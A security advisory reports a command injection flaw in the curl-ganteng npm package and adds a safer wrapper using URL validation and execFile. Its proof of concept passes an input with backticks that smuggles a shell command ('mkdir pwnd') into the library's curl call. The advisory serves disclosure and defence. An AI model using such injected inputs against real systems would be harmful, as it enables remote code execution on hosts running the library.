Summary

Affected versions of the curl-ganteng npm package are vulnerable to command injection in the curl function.

Product

All versions of curl-ganteng npm package.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps to reproduce

Run the following PoC:

var curl = require('curl-ganteng')
curl.curl("google.com' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected result:

A new folder named ‘pwnd’ will be created.

Remediation

No fixed version has been released. As a workaround, avoid passing untrusted input into the vulnerable parameters when using the library.
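
One way to apply this workaround, as an added example that is not code from the advisory or from the package: validate the input as an http(s) URL and run the system curl binary (assumed to be on PATH) through execFile with an argument array, so no shell ever parses the value. The names safeCurlArgs and safeCurl are hypothetical.

```javascript
const { execFile } = require('node:child_process');

// Hypothetical helper: turn untrusted input into an argv array for curl.
// Throws if the input is not an absolute http(s) URL.
function safeCurlArgs(input) {
  if (typeof input !== 'string') {
    throw new TypeError('URL must be a string');
  }
  let url;
  try {
    url = new URL(input); // rejects scheme-less strings such as the PoC input
  } catch {
    throw new Error('not an absolute URL');
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error('only http and https URLs are allowed');
  }
  return [
    '--silent', '--show-error',
    '--proto', '=http,https', // curl itself refuses other schemes
    '--',                     // end of options: the value cannot be read as a flag
    url.href,                 // normalised form, passed as one argv element
  ];
}

// Hypothetical wrapper: resolves with the response body, rejects on any error.
function safeCurl(input) {
  return new Promise((resolve, reject) => {
    let args;
    try {
      args = safeCurlArgs(input);
    } catch (err) {
      reject(err);
      return;
    }
    // execFile starts curl directly; quotes and backticks are never
    // interpreted because no shell is involved.
    execFile('curl', args, { timeout: 10000 }, (err, stdout) => {
      if (err) reject(err);
      else resolve(stdout);
    });
  });
}
```

With this wrapper the PoC string above is rejected before any process is started, and shell metacharacters inside an otherwise valid URL reach curl only as data.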

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. curl-ganteng npm package